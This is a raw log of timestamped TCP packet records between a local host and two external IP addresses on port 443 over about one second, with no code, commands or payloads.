Jul 27, 2024 07:44:08.844995022 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.847049952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.847091913 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.847116947 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.847126961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.847146034 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.847166061 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.861928940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.861972094 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.862116098 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.862128973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.863827944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.898199081 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.898241997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.898376942 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.898376942 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.898399115 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.898421049 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.898447037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.898454905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.898471117 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.898483992 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.898545980 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.898554087 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.898596048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899040937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899080038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899101019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899106979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899130106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899148941 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899576902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899626970 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899646044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899653912 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899666071 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899691105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899926901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899971962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.899991035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.899996996 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.900019884 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.900037050 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.901738882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.932979107 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.933021069 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.933176994 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.933197021 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.933294058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.933341980 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.933360100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.933367968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.933398008 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.933423042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.964407921 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.964448929 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.964498043 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.964519024 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.964529037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.964555979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.986223936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.986263990 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.986411095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.986426115 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.986471891 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.986520052 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.986541033 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.986547947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.986587048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.988451004 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988518953 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.988534927 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988596916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.988708019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988746881 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988768101 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.988774061 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988799095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.988817930 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.988893032 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988938093 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988955021 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.988962889 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.988991976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.989001036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.019570112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.019608974 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.019680023 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.019691944 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.019706011 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.019727945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.019804001 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.019844055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.019865990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.019870996 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.019885063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.019901037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.052309990 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.052350044 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.052400112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.052409887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.052436113 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.052453995 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.073671103 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.073713064 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.073764086 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.073774099 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.073801041 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.073811054 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.074337959 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.074378014 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.074404001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.074409008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.074433088 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.074451923 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.075431108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.075484991 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.075505972 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.075510979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.075536966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.075551033 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.075859070 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.075903893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.075921059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.075927019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.075948954 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.075958014 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.076073885 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.076112986 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.076136112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.076142073 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.076155901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.076174974 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.337568998 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.337598085 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.337784052 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.337805986 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.337914944 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.337939024 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338030100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338030100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338030100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338051081 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338244915 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338393927 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338413000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338459015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338469982 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338512897 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338825941 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338845968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338876963 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338882923 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.338908911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.338918924 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.339202881 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.339236021 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.339258909 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.339263916 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.339292049 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.339297056 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.339570045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.339597940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.339679003 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.339679003 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.339684963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.339724064 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.339983940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340007067 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340034008 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.340039015 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340065002 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.340074062 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.340318918 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340341091 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340369940 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.340374947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340399981 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.340439081 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.340755939 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340785027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340840101 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.340846062 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.340902090 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341039896 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341065884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341120005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341125011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341181040 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341353893 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341394901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341418028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341449022 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341454983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341480970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341492891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341715097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341738939 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341767073 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341773033 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.341790915 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.341809988 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342067957 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342097044 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342124939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342132092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342152119 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342159986 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342386961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342410088 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342535973 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342541933 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342590094 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342695951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342719078 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342746019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342751026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.342777967 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.342786074 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343015909 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343045950 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343071938 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343077898 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343105078 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343105078 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343346119 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343369007 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343394995 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343400955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343425989 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343436003 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343661070 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343683004 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343708992 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343714952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.343736887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.343755007 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.349714994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.349745989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.349783897 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.349797010 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.349808931 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.349832058 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.349883080 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.349900961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.349930048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.349936008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.349961996 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.349972963 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350203991 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350224972 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350255966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350260973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350277901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350296974 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350413084 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350436926 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350465059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350471020 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350486994 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350508928 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350720882 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350747108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350773096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350779057 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350805044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350805044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.350946903 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350966930 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.350997925 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.351003885 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.351028919 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.351044893 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.353264093 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.353343964 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.355731010 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.355740070 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.355787992 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.355792046 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.355834007 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.355838060 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.356219053 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.356642008 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.356679916 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.356724024 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.356729984 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.356920958 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.356950045 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.357232094 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.357248068 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.357528925 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.357541084 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.357810974 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.357821941 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.358082056 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.358093023 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.358369112 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.358385086 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.358649015 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.358659983 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.358928919 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.358942032 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.359213114 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.359224081 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.359270096 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:09.359277010 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:09.364268064 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.372672081 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.372705936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.372739077 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.372754097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.372770071 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.372793913 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.373285055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.373307943 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.373337030 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.373343945 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.373370886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.373385906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.416213036 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.416233063 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.416261911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.416273117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.416282892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.416309118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.419615984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.424372911 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.424391985 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.424420118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.424427032 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.424441099 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.424462080 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.427670956 CEST	443	62252	185.149.100.242	192.168.2.4
